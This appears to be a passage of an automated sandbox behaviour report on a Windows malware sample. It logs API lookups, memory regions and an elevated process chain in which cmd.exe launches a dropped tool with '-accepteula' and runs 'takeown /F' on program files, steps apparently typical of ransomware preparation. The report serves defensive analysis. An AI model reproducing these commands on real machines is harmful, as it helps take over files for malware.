| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:30 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #206: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #206 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "msoeres.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x768 |
| Parent PID | 0xf08 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BE8
0x
C4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x04bcffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04bdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04be3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bf3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04c13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d60000 | 0x04d60000 | 0x04d63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d70000 | 0x04d70000 | 0x04d70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04d81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d90000 | 0x04e4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x052affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052b0000 | 0x055e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecb0000 | 0x7ecb0000 | 0x7edaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edb0000 | 0x7edb0000 | 0x7edd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edd6000 | 0x7edd6000 | 0x7edd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edd9000 | 0x7edd9000 | 0x7edd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eddb000 | 0x7eddb000 | 0x7edddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edde000 | 0x7edde000 | 0x7eddefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 58, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xd6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #207: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #207 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x408 |
| Parent PID | 0x6f8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD0
0x
C8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x047cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x047effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047d0000 | 0x047d0000 | 0x047dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000047e0000 | 0x047e0000 | 0x047e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047f0000 | 0x047f0000 | 0x047f1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x047f0000 | 0x047f4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004800000 | 0x04800000 | 0x04813fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x0485ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004860000 | 0x04860000 | 0x0489ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048a0000 | 0x048a0000 | 0x048a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000048b0000 | 0x048b0000 | 0x048b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000048c0000 | 0x048c0000 | 0x048c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x048d0000 | 0x0498dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x049cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04a1ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04a20000 | 0x04a49fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04e47fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x04fd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004fe0000 | 0x04fe0000 | 0x063dffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x063e0000 | 0x06716fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f8a0000 | 0x7f8a0000 | 0x7f99ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f9a0000 | 0x7f9a0000 | 0x7f9c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f9c6000 | 0x7f9c6000 | 0x7f9c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9c9000 | 0x7f9c9000 | 0x7f9cbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9cc000 | 0x7f9cc000 | 0x7f9cefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9cf000 | 0x7f9cf000 | 0x7f9cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #208: g13k6qzj64.exe
67
0
| Information | Value |
|---|---|
| ID | #208 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc88 |
